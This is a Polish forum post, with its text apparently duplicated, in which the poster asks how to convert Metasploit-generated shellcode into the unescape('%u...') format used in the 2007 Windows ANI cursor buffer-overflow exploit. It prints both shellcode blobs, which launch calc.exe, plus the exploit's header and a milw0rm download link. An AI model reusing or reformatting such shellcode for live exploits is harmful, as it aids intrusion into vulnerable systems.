Cześć, mam problem z pewnym exploitem:
Windows Animated Cursor Handling Exploit
Jego shellcode jest zapisany tak:
ten odpala akurat calc.exe
i teraz nie wiem jak z takiego shellcode wygenerowanego z metasploit.com
uzyskać shellcode w takim formacie jak jest w tym exploicie. Był bym baaardzo wdzięczny jeśli ktoś by mi w tym pomógł bo jest mi to potrzebne do szkoły.
a wiem, że ten explot miał wygenerowanego shellcoda-a z metasploit bo czytam:
Z góry dzięki za pomoc !
Windows Animated Cursor Handling Exploit
Jego shellcode jest zapisany tak:
Kod:
shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u0065");ten odpala akurat calc.exe
i teraz nie wiem jak z takiego shellcode wygenerowanego z metasploit.com
Kod:
/* win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub [url]http://metasploit.com[/url] */
unsigned char scode[] =
"\x33\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x44"
"\x46\x39\xc7\x83\xeb\xfc\xe2\xf4\xb8\xae\x7d\xc7\x44\x46\xb2\x82"
"\x78\xcd\x45\xc2\x3c\x47\xd6\x4c\x0b\x5e\xb2\x98\x64\x47\xd2\x8e"
"\xcf\x72\xb2\xc6\xaa\x77\xf9\x5e\xe8\xc2\xf9\xb3\x43\x87\xf3\xca"
"\x45\x84\xd2\x33\x7f\x12\x1d\xc3\x31\xa3\xb2\x98\x60\x47\xd2\xa1"
"\xcf\x4a\x72\x4c\x1b\x5a\x38\x2c\xcf\x5a\xb2\xc6\xaf\xcf\x65\xe3"
"\x40\x85\x08\x07\x20\xcd\x79\xf7\xc1\x86\x41\xcb\xcf\x06\x35\x4c"
"\x34\x5a\x94\x4c\x2c\x4e\xd2\xce\xcf\xc6\x89\xc7\x44\x46\xb2\xaf"
"\x78\x19\x08\x31\x24\x10\xb0\x3f\xc7\x86\x42\x97\x2c\x38\xe1\x25"
"\x37\x2e\xa1\x39\xce\x48\x6e\x38\xa3\x25\x58\xab\x27\x68\x5c\xbf"
"\x21\x46\x39\xc7";uzyskać shellcode w takim formacie jak jest w tym exploicie. Był bym baaardzo wdzięczny jeśli ktoś by mi w tym pomógł bo jest mi to potrzebne do szkoły.
a wiem, że ten explot miał wygenerowanego shellcoda-a z metasploit bo czytam:
Kod:
Microsoft ANI Buffer Overflow Exploit
Author: Trirat Puttaraksa
[url]http://sf-freedom.blogspot.com[/url]
Tested on: Windows XP SP2 fully patched + IE 6 SP2
For educational purpose only
There are many confuses about this vulnerability. Someone said that this could
not be exploited in XP SP2 - that's wrong. I provide this exploit because I
wanna to tell these people that they are in danger.
[b]This exploit will call calc.exe (shellcode fome metasploit win32_exec
CMD=calc.exe EXITFUNC=process).[/b]
P.S. I do not include the source code for generate the .ani file because of
its damage. However, if you reverse engineer .ani file, you will know how
could I produce this exploit in 10 minutes.
I will describe this vulnerability and how to exploit it in my blog
after M$ released patch.
greets: used SkyLined's idea of exploitation. tnx to him.
[url]http://www.milw0rm.com/sploits/04012007-ani.zip[/url]
# milw0rm.com [2007-04-01]Z góry dzięki za pomoc !